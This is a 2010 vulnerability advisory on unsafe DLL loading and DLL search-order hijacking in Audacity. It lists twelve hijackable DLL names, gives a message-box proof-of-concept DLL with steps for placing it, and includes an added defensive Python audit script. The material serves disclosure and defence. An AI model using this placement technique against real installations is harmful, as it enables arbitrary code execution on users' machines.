Audacity <= 1.3 Beta Multiple Local Vulnerabilities

2010-11-02T00:00:00
ID SECURITYVULNS:DOC:25043
Type securityvulns
Reporter Securityvulns
Modified 2010-11-02T00:00:00

Description

Audacity <= 1.3 Beta Multiple Local Vulnerabilities

Name: Audacity
Vendor: http://audacity.sourceforge.net
Versions Affected: <= 1.3 Beta

Author: Salvatore Fresta aka Drosophila
Website: http://www.salvatorefresta.net
Contact: salvatorefresta [at] gmail [dot] com
Date: 2010-10-29

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION


Audacity is free, open source software for recording and editing sounds.

II. DESCRIPTION


The vulnerabilities are caused due to the application loading libraries in an insecure manner.

I tested the versions 1.2.6 (stable) and the 1.3 Beta.

Other versions could be vulnerable.

III. ANALYSIS


Summary:

A) Unsafe DLL Loading
B) DLL Hijacking

A) Unsafe DLL Loading

Audacity tries to load every DLL present in its Plug-Ins directory without checking for any specific name. This can be exploited to execute arbitrary code with the privileges of the currently logged-on user.

File-system and socket I/O from a DLL loaded this way were tested and work correctly.

B) DLL Hijacking

Audacity's installation folder does not contain any DLL files by default. When the application loads certain DLLs, it looks in the installation directory first and only afterwards in the system32 directory. Because of this, the load operation can be hijacked by placing a malicious DLL with the same name in the installation directory. The following is the list of affected DLLs:

wintrust.dll
msasn1.dll
msacm32.dll
midimap.dll
wsock32.dll
ws2_32.dll
ws2help.dll
winmm.dll
lpk.dll
usp10.dll
setupapi.dll
crypt32.dll
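As an added example that is not part of the original advisory, the following Python script audits an Audacity-style install tree for the two conditions described above: an affected DLL name that resolves in the application directory ahead of system32, and any DLL at all sitting in Plug-Ins. The directory layout, the file names in demo() and the use of a temporary directory are constructed for the demonstration; the DLL list is the one given in the advisory.

```python
"""Audit an install tree for DLL search-order hijack candidates (added
example, not from the advisory). Models the legacy Windows search order the
text describes (application directory before system32); the tree built in
demo() is constructed for the demonstration."""
import os
import tempfile

# DLL names taken from the advisory's list of affected libraries.
AFFECTED_DLLS = {
    "wintrust.dll", "msasn1.dll", "msacm32.dll", "midimap.dll",
    "wsock32.dll", "ws2_32.dll", "ws2help.dll", "winmm.dll",
    "lpk.dll", "usp10.dll", "setupapi.dll", "crypt32.dll",
}

def resolve_dll(name, search_path):
    """First directory in search_path that holds `name`, or None."""
    for directory in search_path:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None

def audit_install(app_dir, system_dir):
    """Return (shadowed, plugin_dlls): affected DLLs that resolve somewhere
    other than system_dir, and every .dll found in app_dir/Plug-Ins."""
    shadowed = []
    for name in sorted(AFFECTED_DLLS):
        # application directory is consulted before the system directory
        hit = resolve_dll(name, [app_dir, system_dir])
        if hit and os.path.dirname(hit) != system_dir:
            shadowed.append((name, hit))
    plugins = os.path.join(app_dir, "Plug-Ins")
    plugin_dlls = []
    if os.path.isdir(plugins):  # every DLL here is loaded without a name check
        plugin_dlls = sorted(f for f in os.listdir(plugins)
                             if f.lower().endswith(".dll"))
    return shadowed, plugin_dlls

def demo():
    """Constructed tree: wintrust.dll in the install folder shadows the
    system copy, msasn1.dll exists only in system32, one DLL sits in Plug-Ins."""
    root = tempfile.mkdtemp()
    app, sys32 = os.path.join(root, "Audacity"), os.path.join(root, "system32")
    os.makedirs(os.path.join(app, "Plug-Ins"))
    os.makedirs(sys32)
    for rel in ("Audacity/wintrust.dll", "system32/wintrust.dll",
                "system32/msasn1.dll", "Audacity/Plug-Ins/evil.dll"):
        open(os.path.join(root, *rel.split("/")), "w").close()
    return audit_install(app, sys32)
```

Running demo() reports wintrust.dll as shadowed by the copy in the install folder and evil.dll as a Plug-Ins DLL, while msasn1.dll is not flagged because it resolves to system32.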

IV. SAMPLE CODE


A/B) Unsafe DLL Loading / DLL Hijacking

The following is the sample code (evil.c) for wintrust.dll:

// compile: gcc -shared -o wintrust.dll evil.c
#include <windows.h>

// Entry point called when the DLL is loaded; shows a message box as proof of loading.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK);
    return TRUE;
}

Copy it into the Plug-Ins directory to exploit the first flaw, or into the installation directory to exploit the second.

V. FIX


No fix.